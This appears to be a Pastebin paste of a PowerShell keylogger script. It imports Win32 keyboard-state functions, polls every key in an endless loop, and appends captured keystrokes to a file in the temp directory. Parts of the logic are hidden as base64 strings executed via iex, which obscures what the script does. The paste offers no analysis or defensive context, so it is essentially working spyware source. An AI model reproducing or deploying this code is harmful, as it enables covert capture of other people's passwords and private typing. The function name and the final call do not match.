SHARE
TWEET

Untitled

a guest Nov 22nd, 2019 81 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. function aaaa($Path="$env:temp\keys")
  3. {
  4.   # Signatures for API Calls
  5.   $signatures = @'
  6. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  7. public static extern short GetAsyncKeyState(int virtualKeyCode);
  8. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  9. public static extern int GetKeyboardState(byte[] keystate);
  10. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  11. public static extern int MapVirtualKey(uint uCode, int uMapType);
  12. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  13. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  14. '@
  15.  
  16.   # load signatures and make members available
  17.   $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
  18.    
  19.   # create output file
  20.   $null = New-Item -Path $Path -ItemType File -Force
  21.  
  22.     # create endless loop. When user presses CTRL+C, finally-block
  23.     # executes and shows the collected key presses
  24.     while ($true) {
  25.       Start-Sleep -Milliseconds 40
  26.      
  27.       # scan all ASCII codes above 8
  28.       for ($ascii = 9; $ascii -le 254; $ascii++) {
  29.         # get current key state
  30.        
  31. [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("IAAkAHMAdABhAHQAZQAgAD0AIAAkAEEAUABJADoAOgBHAGUAdABBAHMAeQBuAGMASwBlAHkAUwB0AGEAdABlACgAJABhAHMAYwBpAGkAKQA="))|iex
  32.  
  33.  
  34.         # is key pressed?
  35.         if ($state -eq -32767) {
  36.           $null = [console]::CapsLock
  37.  
  38. [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("IAAgACAAIAAgACAAIAAgACAAIAAjACAAdAByAGEAbgBzAGwAYQB0AGUAIABzAGMAYQBuACAAYwBvAGQAZQAgAHQAbwAgAHIAZQBhAGwAIABjAG8AZABlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACQAdgBpAHIAdAB1AGEAbABLAGUAeQAgAD0AIAAkAEEAUABJADoAOgBNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAJABhAHMAYwBpAGkALAAgADMAKQANAAoADQAKACAAIAAgACAAIAAgACAAIAAgACAAIwAgAGcAZQB0ACAAawBlAHkAYgBvAGEAcgBkACAAcwB0AGEAdABlACAAZgBvAHIAIAB2AGkAcgB0AHUAYQBsACAAawBlAHkAcwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAkAGsAYgBzAHQAYQB0AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEIAeQB0AGUAWwBdACAAMgA1ADYADQAKACAAIAAgACAAIAAgACAAIAAgACAAJABjAGgAZQBjAGsAawBiAHMAdABhAHQAZQAgAD0AIAAkAEEAUABJADoAOgBHAGUAdABLAGUAeQBiAG8AYQByAGQAUwB0AGEAdABlACgAJABrAGIAcwB0AGEAdABlACkA"))|iex
  39.  
  40.           # prepare a StringBuilder to receive input key
  41.           $mychar = New-Object -TypeName System.Text.StringBuilder
  42.  
  43.           # translate virtual key
  44.           $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
  45.  
  46.           if ($success)
  47.           {
  48.             # add key to logger file
  49.             [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
  50.           }
  51.         }
  52.       }
  53.     }
  54.   }
  55.  
  56. Start-KeyLogger
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top